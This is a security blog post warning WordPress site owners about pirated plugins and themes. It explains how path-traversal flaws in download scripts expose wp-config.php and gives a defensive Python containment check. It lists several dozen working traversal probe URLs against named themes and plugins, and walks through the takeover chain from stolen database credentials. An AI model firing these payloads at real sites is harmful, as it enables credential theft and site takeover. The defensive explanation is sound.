Stop using pirated WordPress plugins and themes. They may contain backdoor code.

The popularity of the WordPress content management system makes it a permanent target, and automated scanners probe WordPress sites around the clock. The problem is rarely the WordPress core, which is actively maintained and patched quickly; it is the third-party plugins and themes, and above all the "free" pirated ("nulled") copies of paid ones, that make a site weak.

If you are serious about doing business online and you choose WordPress, pay for the plugins and themes you use rather than hunting for pirated copies. Those "free" versions of normally paid software are frequently modified to carry backdoor code that gives someone else easy entry to your site and, from there, to your hosting account.

The lists below show the requests an attacker sends to find a download script he knows about on a site and use it to pull the site's wp-config.php, the first step toward the WordPress admin, the database or FTP.

Each entry is a URL typed into an ordinary browser address bar. The file= (or similar) parameter is a path-traversal payload: the vulnerable script takes the value as given, walks up the directory tree one "../" at a time and returns whatever file is named, here wp-config.php. That file holds the database host, name, username and password, plus the authentication keys and salts. If the database accepts remote connections, the attacker connects with those credentials and adds himself as an administrator; the same credentials also serve anyone who already has a foothold on the hosting server. His next step is to log in to the WordPress site, install a file-manager or FTP plugin (or just use the built-in theme and plugin editor to run his own PHP) and gain full access to the files in the hosting account.
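The check those download scripts are missing, as an added example in Python rather than the PHP of the scripts themselves (this is not WordPress or any plugin's code): resolve the requested name against the only directory the handler is allowed to serve from, and refuse anything that lands outside it. The directory layout, file names and the base_dir name are constructed for the demonstration.

```python
import os
import tempfile

# Added example: the containment check a file-download handler needs before
# serving a client-supplied file name.  Nothing here is WordPress code.


class TraversalError(ValueError):
    """Raised when a requested path escapes the allowed base directory."""


def safe_download_path(base_dir: str, requested: str) -> str:
    """Return the absolute path to serve, or raise TraversalError.

    The vulnerable scripts simply append the file= value and read it.  Here
    the name is rejected if absolute, then resolved (symlinks and '..'
    collapsed) and checked to lie inside base_dir before anything is read.
    """
    if os.path.isabs(requested) or requested.startswith("\\"):
        raise TraversalError(f"absolute path refused: {requested!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalError(f"path escapes {base}: {requested!r}")
    if not os.path.isfile(candidate):
        raise FileNotFoundError(candidate)
    return candidate


def build_demo_site() -> str:
    """Create a throw-away tree shaped like a WordPress install (constructed
    sample, nothing real) and return its root directory."""
    root = tempfile.mkdtemp(prefix="wpdemo_")
    scripts = os.path.join(root, "wp-content", "themes", "demo", "lib", "scripts")
    os.makedirs(os.path.join(scripts, "files"))
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php define('DB_PASSWORD', 'not-a-real-secret');\n")
    with open(os.path.join(scripts, "files", "brochure.pdf"), "w") as f:
        f.write("%PDF-1.4 placeholder\n")
    return root


def demo() -> dict:
    """Serve one legitimate file and attempt the traversal payloads from the
    page against the hardened resolver; returns what happened to each."""
    root = build_demo_site()
    # The handler may only serve from .../lib/scripts/files (assumed base dir).
    base = os.path.join(root, "wp-content", "themes", "demo", "lib", "scripts", "files")
    results = {"legit": os.path.basename(safe_download_path(base, "brochure.pdf"))}
    payloads = (
        "../../../../../../wp-config.php",          # exactly reaches the site root
        "/wp-config.php",                           # absolute path attempt
        "files/../../../../../../../wp-config.php", # extra '..' past the root
        "../../../../../../../../../../etc/passwd", # not even a WordPress file
    )
    for payload in payloads:
        try:
            safe_download_path(base, payload)
            results[payload] = "SERVED"   # this is the bug the page describes
        except TraversalError:
            results[payload] = "blocked"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{outcome:8} {name}")
```

The realpath step matters: checking for a literal "../" in the string is not enough, because encoded forms, mixed separators and symlinks can all bypass a string match, while a resolved path either starts with the base directory or it does not.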

Protect your website by using legitimately purchased WordPress software. If a fly-by-night webmaster is offering pirated "free" scripts that are normally sold by a hard-working developer, just flip them the bird!


This list shows the attacker checking whether the site runs one of the themes whose download script he knows about. If download.php (or its equivalent) is found, the query asks it to return wp-config.php, which will provide the database username and password. These requests are sent blindly to every site, so a purchased copy of the same theme is just as exposed if it is left unpatched.

  • /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
  • /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
  • /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php

In this list the goal is the same, wp-config.php, but the attacker now tries plugins, and a number of admin-ajax.php actions, known to have the same kind of file-download flaw.

  • /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
  • /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
  • /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
  • /wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
  • /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php
  • /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
  • /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
  • /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
  • /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php
  • /wp-content/force-download.php?file=../wp-config.php
  • /wp-content/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
  • /wp-admin/blog/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=showbiz_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php
  • /wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
  • /wordpress/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
  • /wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
  • /mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=../../../../wp-config.php
  • /index.php/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php


These probe strings circulate in public scanner wordlists and are fired automatically at every reachable WordPress site, so the attempts are relentless and indiscriminate.
